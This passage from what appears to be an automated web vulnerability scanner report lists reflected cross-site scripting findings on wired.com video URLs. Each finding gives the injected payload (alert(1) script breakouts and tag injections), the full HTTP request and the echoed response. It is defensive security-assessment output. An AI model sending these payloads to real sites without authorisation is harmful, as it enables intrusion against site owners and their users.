User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 01:00:12 GMT
Date: Mon, 22 Nov 2010 00:55:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106758


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_harry-potter-and-the-halfblood-prince c_145453050019dbca"><a>251f69d7bf9">
...[SNIP]...

1.907. http://www.wired.com/video/howto [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/howto

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b00f1"><a>b64741599e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videob00f1"><a>b64741599e3/howto HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29338
Vary: Accept-Encoding
Cache-Control: max-age=292
Expires: Mon, 22 Nov 2010 00:53:18 GMT
Date: Mon, 22 Nov 2010 00:48:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videob00f1"><a>b64741599e3 ss_howto">
...[SNIP]...

1.908. http://www.wired.com/video/howto [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/howto

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69008"><a>c07367fd69a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/howto69008"><a>c07367fd69a HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=288
Expires: Mon, 22 Nov 2010 00:55:46 GMT
Date: Mon, 22 Nov 2010 00:50:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106666


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_howto69008"><a>c07367fd69a">
...[SNIP]...

1.909. http://www.wired.com/video/howto [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/howto

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed5a0"-alert(1)-"5b13b736c77 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/howtoed5a0"-alert(1)-"5b13b736c77 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:57:06 GMT
Date: Mon, 22 Nov 2010 00:52:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106619


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "howtoed5a0"-alert(1)-"5b13b736c77","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.910. http://www.wired.com/video/institute-for-business--home-safety/619269818001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/institute-for-business--home-safety/619269818001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f8e8"><a>35211efdab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video5f8e8"><a>35211efdab/institute-for-business--home-safety/619269818001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29424
Vary: Accept-Encoding
Cache-Control: max-age=289
Expires: Mon, 22 Nov 2010 00:55:38 GMT
Date: Mon, 22 Nov 2010 00:50:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video5f8e8"><a>35211efdab ss_institute-for-business--home-safety c_619269818001">
...[SNIP]...

1.911. http://www.wired.com/video/institute-for-business--home-safety/619269818001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/institute-for-business--home-safety/619269818001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload a4846--><script>alert(1)</script>6c3251ea1d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /videoa4846--><script>alert(1)</script>6c3251ea1d1/institute-for-business--home-safety/619269818001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29459
Vary: Accept-Encoding
Cache-Control: max-age=275
Expires: Mon, 22 Nov 2010 00:56:12 GMT
Date: Mon, 22 Nov 2010 00:51:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /videoa4846--><script>alert(1)</script>6c3251ea1d1/institute-for-business--home-safety/619269818001
-->
...[SNIP]...

1.912. http://www.wired.com/video/institute-for-business--home-safety/619269818001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/institute-for-business--home-safety/619269818001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 489b5"><a>0e6e46c2951 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/institute-for-business--home-safety489b5"><a>0e6e46c2951/619269818001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:56:38 GMT
Date: Mon, 22 Nov 2010 00:51:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_institute-for-business--home-safety489b5"><a>0e6e46c2951 c_619269818001">
...[SNIP]...

1.913. http://www.wired.com/video/institute-for-business--home-safety/619269818001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/institute-for-business--home-safety/619269818001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a92e5"-alert(1)-"76a44198558 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/institute-for-business--home-safetya92e5"-alert(1)-"76a44198558/619269818001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:57:44 GMT
Date: Mon, 22 Nov 2010 00:52:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106770


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "619269818001","institute-for-business--home-safetya92e5"-alert(1)-"76a44198558","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.914. http://www.wired.com/video/institute-for-business--home-safety/619269818001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/institute-for-business--home-safety/619269818001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0885"><a>cdadafd2898 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/institute-for-business--home-safety/619269818001a0885"><a>cdadafd2898 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:57:47 GMT
Date: Mon, 22 Nov 2010 00:52:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106759


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_institute-for-business--home-safety c_619269818001a0885"><a>cdadafd2898">
...[SNIP]...

1.915. http://www.wired.com/video/institute-for-business--home-safety/619269818001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/institute-for-business--home-safety/619269818001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bc23"-alert(1)-"45d1e9311d0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/institute-for-business--home-safety/6192698180012bc23"-alert(1)-"45d1e9311d0 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=290
Expires: Mon, 22 Nov 2010 00:58:53 GMT
Date: Mon, 22 Nov 2010 00:54:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106709


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "institute-for-business--home-safety","6192698180012bc23"-alert(1)-"45d1e9311d0","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.916. http://www.wired.com/video/interviews [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/interviews

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f635"><a>1709f4fc8f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video8f635"><a>1709f4fc8f0/interviews HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29348
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:53:15 GMT
Date: Mon, 22 Nov 2010 00:48:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video8f635"><a>1709f4fc8f0 ss_interviews">
...[SNIP]...

1.917. http://www.wired.com/video/interviews [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/interviews

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89c63"-alert(1)-"73f900c21ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/interviews89c63"-alert(1)-"73f900c21ca HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=286
Expires: Mon, 22 Nov 2010 00:56:15 GMT
Date: Mon, 22 Nov 2010 00:51:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106690


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "interviews89c63"-alert(1)-"73f900c21ca","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.918. http://www.wired.com/video/interviews [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/interviews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2cd1"><a>9854118d6a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/interviewsb2cd1"><a>9854118d6a7 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:55:14 GMT
Date: Mon, 22 Nov 2010 00:50:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106679


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_interviewsb2cd1"><a>9854118d6a7">
...[SNIP]...

1.919. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload f8c52--><script>alert(1)</script>16b9361acca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /videof8c52--><script>alert(1)</script>16b9361acca/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29490
Vary: Accept-Encoding
Cache-Control: max-age=299
Expires: Mon, 22 Nov 2010 00:52:34 GMT
Date: Mon, 22 Nov 2010 00:47:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /videof8c52--><script>alert(1)</script>16b9361acca/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001
-->
...[SNIP]...

1.920. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddcc0"><a>353379e16c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videoddcc0"><a>353379e16c7/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29453
Vary: Accept-Encoding
Cache-Control: max-age=276
Expires: Mon, 22 Nov 2010 00:51:35 GMT
Date: Mon, 22 Nov 2010 00:46:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videoddcc0"><a>353379e16c7 ss_latest-videos c_featured">
...[SNIP]...

1.921. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f6b3"-alert(1)-"04386ae1d6d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

